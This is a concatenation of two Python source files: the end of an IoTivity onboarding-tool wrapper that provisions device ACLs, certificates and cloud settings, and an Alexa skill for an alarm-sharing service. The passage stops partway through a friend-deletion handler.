        self.lib.py_provision_ace_cloud_access(device_uuid)
        start_time = time.time()
        timeout = 10
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Provisioning ACE cloud access succeeded for: {device_uuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Provisioning ACE cloud access failed for: {device_uuid} {device_name}")
    time.sleep(1)
def provision_ace_d2dserverlist(self, device_uuid):
    """Provision an ACE for /d2dserverlist on *device_uuid*, with retries."""
    # fix: the original configured argtypes/restype on
    # py_provision_ace_cloud_access, not on the function actually called below
    self.lib.py_provision_ace_d2dserverlist.argtypes = [String]
    self.lib.py_provision_ace_d2dserverlist.restype = None
    device_name = self.get_device_name(device_uuid)
    print( "provision_ace_d2dserverlist (ACL):",device_uuid)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_provision_ace_d2dserverlist(device_uuid)
        start_time = time.time()
        timeout = 10
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Provisioning ACE /d2dserverlist succeeded for: {device_uuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Provisioning ACE /d2dserverlist failed for: {device_uuid} {device_name}")
    time.sleep(1)
def provision_ace_device_resources(self, chili_uuid, cloud_proxy_uuid):
    """Grant *cloud_proxy_uuid* (the ACE subject) access to all of *chili_uuid*'s
    resources, with retries (up to 5 attempts, 30s poll window each)."""
    self.lib.py_provision_ace_device_resources.argtypes = [String, String]
    self.lib.py_provision_ace_device_resources.restype = None
    # fix: removed a duplicate, unretried py_provision_ace_device_resources call
    # that fired here before the retry loop below
    chili_name = self.get_device_name(chili_uuid)
    cloud_proxy_name = self.get_device_name(cloud_proxy_uuid)  # also logs the proxy's name
    print (f"py_provision_ace_device_resources (ACL) for: {chili_uuid} {chili_name}")
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_provision_ace_device_resources(chili_uuid, cloud_proxy_uuid)
        start_time = time.time()
        timeout = 30
        time.sleep(3)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Provisioning ACE device resources (ACL) succeeded for: {chili_uuid} {chili_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Provisioning ACE device resources (ACL) failed for: {chili_uuid} {chili_name}")
    time.sleep(3)
    # fix: removed a stray copy-paste loop that followed here and RESET
    # (offboarded) every owned device at the end of a provisioning call
def provision_pairwise(self, device1_uuid, device2_uuid):
    """Provision pairwise credentials between two owned devices."""
    self.lib.py_provision_pairwise_credentials.argtypes = [String, String]
    self.lib.py_provision_pairwise_credentials.restype = None
    self.lib.py_provision_pairwise_credentials(str(device1_uuid),str(device2_uuid))
def provision_ace(self, target_uuid, subject_uuid, href, crudn):
    """Provision an ACE on *target_uuid* giving *subject_uuid* *crudn* rights on *href*."""
    self.lib.py_provision_ace2.argtypes = [String, String, String, String]
    self.lib.py_provision_ace2.restype = None
    self.lib.py_provision_ace2(target_uuid,subject_uuid,href,crudn)
def provision_ace_cloud_access(self, device_uuid):
    """Provision an ACE granting *device_uuid* cloud access (single attempt).

    NOTE(review): this redefinition SHADOWS the earlier retry-based
    provision_ace_cloud_access in this class — only this simple version runs.
    Confirm which one is intended and delete the other.
    """
    self.lib.py_provision_ace_cloud_access.argtypes = [String]
    self.lib.py_provision_ace_cloud_access.restype = None
    print( "provision_ace_cloud_access (ACL):",device_uuid)
    self.lib.py_provision_ace_cloud_access(device_uuid)
def provision_ace_all(self):
    """Provision cloud-access ACEs on every cached owned device."""
    print ("provision_ace_all....")
    for device in self.owned_devices:
        self.provision_ace_cloud_access(device)
    print ("provision_ace_all...done.")
def provision_ace_cloud_proxy(self, cloud_proxy_uuid):
    """Provision the cloud proxy: cloud-access ACE plus a /d2dserverlist ACE."""
    print ("provision_ace_cloud_proxy....")
    self.provision_ace_cloud_access(cloud_proxy_uuid)
    self.provision_ace_d2dserverlist(cloud_proxy_uuid)
    print ("provision_ace_cloud_proxy...done.")
def provision_ace_chili(self, chili_uuid, cloud_proxy_uuid):
    """Grant the cloud proxy access to all of one chili device's resources."""
    print ("provision_ace_chili....")
    self.provision_ace_device_resources(chili_uuid, cloud_proxy_uuid)
    print ("provision_ace_chili...done.")
def provision_id_cert(self, device_uuid):
    """Provision an identity certificate on *device_uuid*, with retries
    (up to 5 attempts, 20s poll window each)."""
    self.lib.py_provision_id_cert.argtypes = [String]
    self.lib.py_provision_id_cert.restype = None
    device_name = self.get_device_name(device_uuid)
    print( "py_provision_id_cert:", device_uuid, device_name)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_provision_id_cert(device_uuid)
        start_time = time.time()
        timeout = 20
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Provisioning id certs succeeded for: {device_uuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Provisioning id certs failed for: {device_uuid} {device_name}")
    time.sleep(1)
def provision_id_cert_all(self):
    """Provision identity certificates on every cached owned device."""
    print ("provision_id_cert_all....")
    for device in self.owned_devices:
        self.provision_id_cert(device)
    print ("provision_id_cert_all...done.")
def provision_role_cert(self, uuid, role, auth):
    """Provision a role certificate (*role*, *auth*) on the device *uuid*."""
    self.lib.py_provision_role_cert.argtypes = [String, String, String]
    self.lib.py_provision_role_cert.restype = None
    self.lib.py_provision_role_cert(uuid, role, auth)
def discover_resources(self, myuuid):
    """Discover the resources hosted by *myuuid*, with retries.

    Returns {myuuid: <resource list>} from self.resourcelist, or {} if the
    discovery callback never populated an entry for this uuid.
    """
    self.lib.py_discover_resources.argtypes = [String]
    self.lib.py_discover_resources.restype = None
    device_name = self.get_device_name(myuuid)
    print( "py_discover_resources:", myuuid, device_name)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_discover_resources(myuuid)
        start_time = time.time()
        timeout = 10
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Resource discovery succeeded for: {myuuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Resource discovery failed for: {myuuid} {device_name}")
        time.sleep(1)
    # fix: 'ret' was previously unbound when the lookup raised, so the print and
    # return below crashed with UnboundLocalError instead of reporting the miss
    ret = {}
    try:
        ret = {myuuid:self.resourcelist[myuuid]}
    except KeyError as e:  # narrowed from bare Exception: only the dict lookup can raise here
        print("Exception: {} Re-trying resource discovery".format(e))
    print("RET:{}".format(ret))
    return ret
def retrieve_acl2(self, myuuid):
    """Retrieve the /oic/sec/acl2 resource from *myuuid*, with retries
    (up to 5 attempts, 15s poll window each)."""
    self.lib.py_retrieve_acl2.argtypes = [String]
    self.lib.py_retrieve_acl2.restype = None
    device_name = self.get_device_name(myuuid)
    print( "py_retrieve_acl2:", myuuid, device_name)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_retrieve_acl2(myuuid)
        start_time = time.time()
        timeout = 15
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Retrieving ACL2 succeeded for: {myuuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Retrieving ACL2 failed for: {myuuid} {device_name}")
    time.sleep(1)
def provision_cloud_trust_anchor(self, myuuid, cloud_id, cloud_trust_anchor):
    """Install the cloud CA (*cloud_trust_anchor*, tagged with *cloud_id*) on
    *myuuid*, with retries (up to 5 attempts, 10s poll window each)."""
    self.lib.py_provision_cloud_trust_anchor.argtypes = [String, String, String]
    self.lib.py_provision_cloud_trust_anchor.restype = None
    device_name = self.get_device_name(myuuid)
    print( "py_provision_cloud_trust_anchor:", myuuid, device_name)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_provision_cloud_trust_anchor(myuuid, cloud_id, cloud_trust_anchor)
        start_time = time.time()
        timeout = 10
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Provisioning cloud trust anchor succeeded for: {myuuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Provisioning cloud trust anchor failed for: {myuuid} {device_name}")
    time.sleep(1)
def provision_cloud_config_info(self, myuuid, cloud_access_token, cloud_apn, cloud_cis, cloud_id):
    """Push cloud configuration (token, provider, endpoint, id) to *myuuid*,
    with retries (up to 5 attempts, 10s poll window each)."""
    self.lib.py_provision_cloud_config_info.argtypes = [String, String, String, String, String]
    self.lib.py_provision_cloud_config_info.restype = None
    device_name = self.get_device_name(myuuid)
    print( "py_provision_cloud_config_info:", myuuid, device_name)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_provision_cloud_config_info(myuuid, cloud_access_token, cloud_apn, cloud_cis, cloud_id)
        start_time = time.time()
        timeout = 10
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Provisioning cloud config info succeeded for: {myuuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Provisioning cloud config info failed for: {myuuid} {device_name}")
    # NOTE(review): 10s here vs 1s in the sibling methods — confirm intentional
    time.sleep(10)
def retrieve_d2dserverlist(self, myuuid):
    """Retrieve /d2dserverlist from *myuuid*, with retries
    (up to 5 attempts, 10s poll window each)."""
    self.lib.py_retrieve_d2dserverlist.argtypes = [String]
    self.lib.py_retrieve_d2dserverlist.restype = None
    device_name = self.get_device_name(myuuid)
    print( "py_retrieve_d2dserverlist:", myuuid, device_name)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_retrieve_d2dserverlist(myuuid)
        start_time = time.time()
        timeout = 10
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Retrieving /d2dserverlist succeeded for: {myuuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Retrieving /d2dserverlist failed for: {myuuid} {device_name}")
    time.sleep(1)
def post_d2dserverlist(self, myuuid, query):
    """POST *query* (e.g. "di=<uuid>") to /d2dserverlist on *myuuid*,
    with retries (up to 5 attempts, 20s poll window each)."""
    self.lib.py_post_d2dserverlist.argtypes = [String, String]
    self.lib.py_post_d2dserverlist.restype = None
    device_name = self.get_device_name(myuuid)
    print( "py_post_d2dserverlist:", myuuid, device_name)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
        self.lib.py_post_d2dserverlist(myuuid, query)
        start_time = time.time()
        timeout = 20
        time.sleep(1)
        # poll until the C layer reports success or the attempt times out
        while True:
            result = self.get_result()
            end_time = time.time()
            if result or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
        if result:
            print (f"Posting /d2dserverlist succeeded for: {myuuid} {device_name}")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Posting /d2dserverlist failed for: {myuuid} {device_name}")
    time.sleep(1)
def get_idd(self, myuuid):
    """Fetch introspection (IDD) data for *myuuid* by (re)running resource discovery."""
    print("get_idd ", myuuid)
    self.discover_resources(myuuid)
    time.sleep(3)  # allow the discovery callback to populate self.resourcelist
def get_obt_uuid(self):
    """Return this OBT's own uuid from the C layer."""
    self.lib.py_get_obt_uuid.restype = String
    obt_uuid = self.lib.py_get_obt_uuid()
    return str(obt_uuid)
    # NOTE(review): everything below is UNREACHABLE (after the return) and
    # references 'myuuid', which is not a parameter of this method — it looks
    # like it originally belonged to get_idd. Confirm and move or delete.
    #resources = self.resourcelist.get(myuuid)
    print("get_idd ", self.resourcelist)
    #resources = self.resourcelist.get(myuuid)
    print("resources :", isinstance(self.resourcelist, dict))
    for l_uuid, value in self.resourcelist.items():
        print(" uuid in list", l_uuid)
        if l_uuid == myuuid:
            print (" ", value)
def my_sleep(self):
    """Block the calling thread forever (keeps the process alive for callbacks)."""
    while True:
        time.sleep(3)
def test_security(self):
    """End-to-end security test: discover, onboard, provision, and cloud-proxy
    every device, then block forever.

    Expects the cloud proxy at owned index 0 and chili devices at indices 1..n.
    """
    very_start_time = time.time()
    expected_devices = 13  # NOTE(review): hard-coded fleet size — confirm for this testbed
    # SECURITY: verify=False disables TLS certificate validation, and the cloud
    # host IP is hard-coded — acceptable only on a closed test network
    url = 'https://192.168.202.112:8443/.well-known/cloud-configuration'
    r = requests.get(url, verify=False)
    content = r.json()
    cloud_id = content['cloudId']
    cloud_trust_anchor = content['cloudCertificateAuthorities']
    cloud_apn = content['cloudAuthorizationProvider']
    cloud_cis = content['cloudUrl']
    cloud_access_token = "test"
    run_count = 0
    nr_owned = 0
    # up to 5 discovery+onboarding rounds until the whole fleet is owned
    while run_count < 5 and nr_owned < expected_devices:
        run_count += 1
        start_time = time.time()
        timeout = 20
        self.discover_all()
        self.onboard_cloud_proxy()
        self.onboard_chili()
        time.sleep(1)
        # poll the owned count until the fleet is complete or the round times out
        while True:
            nr_owned = self.get_nr_owned_devices()
            end_time = time.time()
            if nr_owned >= expected_devices or end_time > start_time + timeout:
                time_taken = end_time - start_time
                break
            time.sleep(1)
        if nr_owned >= expected_devices:
            print (f"Discovery and onboarding succeeded, {nr_owned}/{expected_devices} devices onboarded")
            print (f"Time taken: {time_taken:.3} seconds")
        else:
            print (f"Discovery and onboarding failed, {nr_owned}/{expected_devices} devices onboarded")
            # roll back partial onboarding before giving up
            self.offboard_all_owned()
            time.sleep(3)
            sys.exit(1)
    self.provision_id_cert_all()
    cloud_proxy_uuid = self.get_owned_uuid(0)  # proxy assumed to be first owned device
    self.provision_ace_cloud_proxy(cloud_proxy_uuid)
    self.discover_resources(cloud_proxy_uuid)
    self.retrieve_acl2(cloud_proxy_uuid)
    self.provision_cloud_trust_anchor(cloud_proxy_uuid, cloud_id, cloud_trust_anchor)
    self.provision_cloud_config_info(cloud_proxy_uuid, cloud_access_token, cloud_apn, cloud_cis, cloud_id)
    # wire every remaining (chili) device through the proxy
    for i in range(1, self.get_nr_owned_devices()):
        chili_uuid = self.get_owned_uuid(i)
        self.provision_ace_chili(chili_uuid, cloud_proxy_uuid)
        time.sleep(5)
        self.retrieve_acl2(chili_uuid)
        time.sleep(5)
        self.post_d2dserverlist(cloud_proxy_uuid, "di=" + chili_uuid)
        time.sleep(10)
        # self.retrieve_d2dserverlist(cloud_proxy_uuid)
        # time.sleep(5)
    proxy_time = time.time() - very_start_time
    print (f"Total time taken to proxy all devices to the cloud: {proxy_time:.3} seconds")
    # keep the process alive so callbacks and the proxied devices keep running
    while True:
        pass
def get_doxm(self,uuid):
    """Trigger a /oic/sec/doxm discovery; prints the cached state for *uuid* first."""
    device = self.get_device(uuid)
    if device:
        print(device.uuid, device.owned_state)
    #self.lib.discover_doxm.argtypes = [String]
    #self.lib.discover_doxm.restype = None
    # NOTE(review): discovery is global — the uuid argument is only used for the print above
    self.lib.discover_doxm()
def client_command(self,uuid,device_type,command,resource,value):
    """Send a client command to *resource* on device *uuid*.

    Returns "ok" on dispatch, "error" when uuid or resource is empty.
    NOTE(review): only the light-change path is implemented — 'command' and
    'device_type' are logged but otherwise unused.
    """
    if len(uuid) and len(resource):
        print(colored(20*" "+"Client Command->Target:{}-->Type:{}-->Res:{}-->Cmd:{}-->Val:{}"+20*" ",'yellow',attrs=['underline']).format(uuid,device_type,resource,command,value))
        #self.lib.py_post.argtypes = [String]
        #self.lib.py_post.restype = None
        #self.lib.py_post(uuid,command)
        self.lib.discover_resource.argtypes = [String,String]
        self.lib.discover_resource.restype = None
        self.lib.discover_resource(resource,uuid)
        time.sleep(1)  # let resource discovery settle before issuing the change
        self.lib.change_light.argtypes = [c_int]
        self.lib.change_light.restype = None
        self.lib.change_light(value)
        return "ok"
    else:
        return "error"
def test_discovery(self):
    """Smoke test: discover, onboard everything, fetch IDD of device 0, offboard."""
    self.discover_all()
    print ("sleeping after discovery issued..")
    time.sleep(3)
    self.onboard_all_unowned()
    time.sleep(3)
    my_uuid = self.get_owned_uuid(0)
    #self.discover_resources(my_uuid)
    self.get_idd(my_uuid)
    time.sleep(3)
    self.offboard_all_owned()
#my_iotivity = Iotivity()
#signal.signal(signal.SIGINT, my_iotivity.sig_handler)
# need this sleep, because it takes a while to start Iotivity in C in a Thread
#time.sleep(1)
#my_iotivity.test_security()
#my_iotivity.test_discovery()
#my_iotivity.quit()
|
alexa.py | # Alexa Pi script.
# 4/12/2021
import sounddevice as sd
from scipy.io.wavfile import write
import json
import logging
import os
import time
import requests
from ask_sdk_core.utils import is_intent_name, get_slot_value
import sched
import time
from flask import Flask
from flask_ask import Ask, request, session, question, statement
from playsound import playsound
import threading
from pydub import AudioSegment
import os
token = ''  # AlarmBuddy auth token; populated by launch() on skill start
# Flask-Ask set up
app = Flask(__name__)
ask = Ask(app, "/")
logging.getLogger('flask_ask').setLevel(logging.DEBUG)
# Service configuration: base_url plus alarmbuddy_account credentials
with open('config.json', 'r') as f:
    config = json.load(f)
# Single shared scheduler used by the alarm and record intents
scheduler = sched.scheduler(time.time, time.sleep)
@ask.launch
def launch():
    """Skill launch: log into AlarmBuddy, cache the auth token, greet the user."""
    global token
    login_url = config['base_url'] + "/login"
    login_data = config['alarmbuddy_account']
    x = requests.post(login_url, data = login_data)
    if(x.status_code != 200):
        speech_text = 'Sorry, I could not log into Alarm Buddy. Please try again later.'
        return statement(speech_text).simple_card(speech_text)
    token = x.json()['token']  # sent as the Authorization header by the other intents
    speech_text = 'Welcome to Alarm Buddy. Would you like to create an alarm? Or you can ask for help.'
    return question(speech_text).reprompt(speech_text).simple_card(speech_text)
@ask.intent('AMAZON.FallbackIntent')
def FallbackIntent():
    """Fallback: user said something that matches no intent; re-prompt them."""
    # A fallback Intent. If a user says something that doesn't correspond to an intent, they're sent here.
    speak_output = 'sorry I did not understand you.'
    return question(speak_output).reprompt(speak_output).simple_card('FallBack', speak_output)
@ask.intent('AMAZON.CancelIntent')
def CancelIntent():
    """Cancel: end the session."""
    # A cancel intent to leave the Alarm Buddy app.
    speak_output = "Goodbye!"
    return statement(speak_output).simple_card('cancel', speak_output)
@ask.intent('AMAZON.StopIntent')
def StopIntent():
    """Stop: end the session."""
    # A stop intent to leave the Alarm Buddy app.
    speak_output = "Goodbye!"
    return statement(speak_output).simple_card('stop', speak_output)
@ask.intent('AlarmBuddy_CreateAlarm', mapping={'day': 'day', 'timeofday': 'timeofday'})
def CreateAlarmIntent(day, timeofday):
    """Schedule an alarm for day+timeofday on the shared sched scheduler."""
    # Creating an alarm intent. Passes in day and timeofday from Amazon Intent Slots.
    if(day is None):
        speak_output = "Sorry, you must specify a day for the alarm."
        return question(speak_output).reprompt(speak_output).simple_card('CreateAlarm_DayError', speak_output)
    elif(timeofday is None):
        speak_output = "Sorry, you must specify a time of day for the alarm."
        return question(speak_output).reprompt(speak_output).simple_card('CreateAlarm_TimeError', speak_output)
    else:
        # Amazon slots arrive as an ISO date ("%Y-%m-%d") and HH:MM time string
        t = time.strptime(day + " " + timeofday, "%Y-%m-%d %H:%M")
        t = time.mktime(t)  # convert to an absolute epoch timestamp for enterabs
        if(t < time.time()):
            speak_output = "Sorry, you cannot create an alarm for the past."
            return question(speak_output).reprompt(speak_output).simple_card('CreateAlarm_PastError', speak_output)
        # the worker thread blocks in scheduler.run until the alarm fires;
        # play_alarm is defined elsewhere in this file
        th = threading.Thread(target=scheduler.run)
        scheduler_e = scheduler.enterabs(t, 1, play_alarm, ([th])) #maybe have sound id here?
        speak_output = "You have created an alarm that will go off on " + day + " at " + timeofday + "."
        th.start()
        return question(speak_output).reprompt(speak_output).simple_card('CreateAlarm', speak_output)
@ask.intent('AlarmBuddy_Record')
def RecordAlarmIntent():
    """Start a microphone recording ~7s from now (after Alexa finishes speaking)."""
    speak_output = "Okay. After I say, start, speak into the microphone... start."
    # record_audio (defined elsewhere in this file) runs on the scheduler thread
    th = threading.Thread(target=scheduler.run)
    scheduler_e = scheduler.enter(7, 1, record_audio, ([th]))
    th.start()
    return statement(speak_output).simple_card('Record', speak_output)
@ask.intent('AlarmBuddy_GetFriends')
def GetFriendIntent():
    """Read out up to six of the user's AlarmBuddy friends."""
    speak_output = 'Your current friends are... '
    friends_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']
    friends_header = {'Authorization': token}
    f = requests.get(friends_url, headers=friends_header)
    if(f.status_code != 200):
        speak_output = "Sorry, I could not get your friends list at this time. Please try again later."
        return question(speak_output).simple_card('getFriendsError', speak_output)
    friends_list = json.loads(f.content)
    if(len(friends_list) <= 0):
        speak_output = "You have no friends on your account."
        return question(speak_output).simple_card('getFriendsNone', speak_output)
    #friends_list = [{'username2': 'amaz0n'}, {'username2': 'Don2'}, {'username2': 'jjj123769'}, {'username2': 'Johnny'}, {'username2': 'Twiggy1'}, {'username2': 'Honk_Supreme'}, {'username2': 'brianna4'}, {'username2': 'woah1'}]
    # speak at most 6 names to keep the response short
    for i in range(6):
        if(i < len(friends_list)):
            speak_output = speak_output + friends_list[i]['username2'] + ", "
    speak_output = speak_output[:-2] + "."  # trailing ", " -> "."
    if(len(friends_list) > 6):
        speak_output = speak_output + " To see more friends, please go to the Alarmbuddy website, or the Alarmbuddy mobile app."
    return question(speak_output).simple_card('getFriends', speak_output)
@ask.intent('AlarmBuddy_GetSounds')
def GetSoundsIntent():
    """Read out every sound (name + id) stored on the user's account."""
    speak_output = 'The sounds on your account are... '
    sounds_url = config['base_url'] + '/sounds/' + config['alarmbuddy_account']['username']
    sounds_header = {'Authorization': token}
    f = requests.get(sounds_url, headers=sounds_header)
    if(f.status_code != 200):
        speak_output = "Sorry, I could not get your sounds list at this time. Please try again later."
        return question(speak_output).simple_card('getSoundsError', speak_output)
    sounds_list = json.loads(f.content)
    if(len(sounds_list) <= 0):
        speak_output = "You have no sounds on your account."
        return question(speak_output).simple_card('getSoundsNone', speak_output)
    #friends_list = [{'username2': 'amaz0n'}, {'username2': 'Don2'}, {'username2': 'jjj123769'}, {'username2': 'Johnny'}, {'username2': 'Twiggy1'}, {'username2': 'Honk_Supreme'}, {'username2': 'brianna4'}, {'username2': 'woah1'}]
    for sound in sounds_list:
        speak_output = speak_output + sound['soundName'] + ' with i.d. ' + str(sound['soundID']) + ', '
    speak_output = speak_output[:-2] + "."  # trailing ", " -> "."
    return question(speak_output).simple_card('getSounds', speak_output)
@ask.intent('AlarmBuddy_GetFriendRequests')
def GetFriendRequestsIntent():
    """Read out the senders of the user's pending friend requests."""
    speak_output = 'Your current requests are... '
    requests_url = config['base_url'] + '/requests/' + config['alarmbuddy_account']['username']
    requests_header = {'Authorization': token}
    f = requests.get(requests_url, headers=requests_header)
    if(f.status_code != 200):
        speak_output = "Sorry, I could not get your friend requests at this time. Please try again later."
        return question(speak_output).simple_card('getFriendRequestsError', speak_output)
    requests_list = json.loads(f.content)
    if(len(requests_list) <= 0):
        speak_output = 'You currently have no incoming friend requests.'
        return question(speak_output).simple_card('getFriendRequests', speak_output)
    for request in requests_list:
        speak_output = speak_output + request['senderUsername'] + ", "
    speak_output = speak_output[:-2] + "."  # trailing ", " -> "."
    return question(speak_output).simple_card('getFriendRequests', speak_output)
@ask.intent('AlarmBuddy_GetBlockList')
def GetBlockListIntent():
    """Read out the accounts the user has blocked."""
    speak_output = 'Your current blocked accounts are... '
    getblock_url = config['base_url'] + '/getBlockList/' + config['alarmbuddy_account']['username']
    getblock_header = {'Authorization': token}
    f = requests.get(getblock_url, headers=getblock_header)
    print(f.content)
    # NOTE(review): this endpoint is treated as succeeding with 201, unlike the
    # 200 used by every other GET here — confirm against the AlarmBuddy API
    if(f.status_code != 201):
        speak_output = "Sorry, I could not get your block list at this time. Please try again later."
        return question(speak_output).simple_card('getBlockListError', speak_output)
    block_list = json.loads(f.content)
    if(len(block_list) <= 0):
        speak_output = 'You currently have nobody on your block list.'
        return question(speak_output).simple_card('getBlockList', speak_output)
    for block in block_list:
        speak_output = speak_output + block['blocked'] + ", "
    speak_output = speak_output[:-2] + "."  # trailing ", " -> "."
    return question(speak_output).simple_card('getBlockList', speak_output)
@ask.intent('AlarmBuddy_SendSounds', mapping={'friend_uname' : 'friend_uname', 'sound_id' : 'sound_id'})
def SendSoundIntent(friend_uname, sound_id):
    """Share one of the account's recorded sounds with a friend.

    Fixes: the missing-slot check now runs BEFORE .replace() (the original
    called friend_uname.replace() first, raising AttributeError whenever the
    slot was absent), and leftover debug prints were removed.
    """
    if(friend_uname is None):
        speak_output = "Sorry, you must specify a username to send a sound to."
        return question(speak_output).reprompt(speak_output).simple_card('AddFriend_UnameError', speak_output)
    if(sound_id is None):
        speak_output = "Sorry, you must specify a recorded sound i.d. to send."
        return question(speak_output).reprompt(speak_output).simple_card('SendSound_SoundIdError', speak_output)
    # Alexa may insert spaces into spelled-out usernames; strip them.
    friend_uname = friend_uname.replace(" ", "")
    # Verify the recipient is actually a friend.
    header = {"Authorization": token}
    friends_list_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']
    friends_list = requests.get(friends_list_url, headers=header).json()
    friend_found = any(friend['username2'] == friend_uname for friend in friends_list)
    if(not friend_found):
        speak_output = "Sorry, you must be friends with someone to send them an alarm."
        return question(speak_output).reprompt(speak_output).simple_card('SendSound_NotFriendError', speak_output)
    # Locate the requested sound among the account's recordings.
    sound_list_url = config['base_url'] + '/sounds/' + config['alarmbuddy_account']['username']
    sound_list = requests.get(sound_list_url, headers=header).json()
    sound_to_send = None
    for sound in sound_list:
        if str(sound['soundID']) == str(sound_id):
            sound_to_send = sound
    if sound_to_send is None:
        speak_output = "Sorry, an alarm sound with that i.d. cannot be found. Have you recorded it?"
        return question(speak_output).reprompt(speak_output).simple_card('SendSound_SoundNotFoundError', speak_output)
    #Send the sound.
    send_sound_url = config['base_url'] + '/shareSound/' + config['alarmbuddy_account']['username'] + '/' + friend_uname + '/' + str(sound_to_send['soundID'])
    u = requests.post(send_sound_url, headers=header)
    if(u.status_code != 201):
        speak_output = "Something went wrong. We couldn't send the sound to your friend."
        return question(speak_output).reprompt(speak_output).simple_card('SendSound_Error', speak_output)
    return statement('Okay. ' + sound_to_send['soundName'] + ' has been sent to ' + friend_uname)
@ask.intent('AlarmBuddy_BlockUser', mapping={'block_uname' : 'block_uname'})
def BlockUser(block_uname):
    """Block the given username on behalf of the configured account."""
    if block_uname is None:
        speak_output = "Sorry, you must specify a username to block."
        return question(speak_output).reprompt(speak_output).simple_card('BlockUser_BlockUsernameIsNone', speak_output)
    # Alexa may insert spaces into spelled-out usernames; strip them.
    target = block_uname.replace(" ", "")
    block_url = config['base_url'] + '/blockUser/' + config['alarmbuddy_account']['username'] + '/' + target
    result = requests.post(block_url, headers={"Authorization": token})
    if result.status_code != 201:
        speak_output = 'Sorry. Failed to block user with the username ' + target
        return question(speak_output).reprompt(speak_output).simple_card('BlockUser_BlockUsernameIsInvalid', speak_output)
    speak_output = 'Okay. The user with the username ' + target + ' has been blocked.'
    return question(speak_output).reprompt(speak_output).simple_card('BlockUser_BlockUsername', speak_output)
@ask.intent('AlarmBuddy_UnblockUser', mapping={'unblock_uname' : 'unblock_uname'})
def UnblockUser(unblock_uname):
    """Unblock a previously blocked username for the configured account."""
    if unblock_uname is None:
        speak_output = "Sorry, you must specify a username to unblock."
        return question(speak_output).reprompt(speak_output).simple_card('UnblockUser_UnblockUsernameIsNone', speak_output)
    # Alexa may insert spaces into spelled-out usernames; strip them.
    target = unblock_uname.replace(" ", "")
    unblock_url = config['base_url'] + '/unblockUser/' + config['alarmbuddy_account']['username'] + '/' + target
    result = requests.post(unblock_url, headers={"Authorization": token})
    if result.status_code != 201:
        speak_output = 'Sorry. Failed to unblock user with the username ' + target
        return question(speak_output).reprompt(speak_output).simple_card('UnBlockUser_BlockUsernameIsInvalid', speak_output)
    speak_output = 'Okay. The user with the username ' + target + ' has been unblocked.'
    return question(speak_output).reprompt(speak_output).simple_card('UnBlockUser_BlockUsername', speak_output)
@ask.intent('AlarmBuddy_DeleteFriend', mapping={'friend_uname' : 'friend_uname'})
def DeleteFriend(friend_uname):
    """Remove an existing friend from the configured account's friend list."""
    if friend_uname is None:
        speak_output = "Sorry, you must specify a friend to delete."
        return question(speak_output).reprompt(speak_output).simple_card('DeleteFriend_FriendIsNone', speak_output)
    target = friend_uname.replace(' ', '')
    auth = {"Authorization": token}
    # Confirm the two accounts are currently friends before attempting the delete.
    listing_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']
    current_friends = requests.get(listing_url, headers=auth).json()
    is_friend = any(entry['username2'] == target for entry in current_friends)
    if not is_friend:
        speak_output = "You already weren't friends with " + target + "."
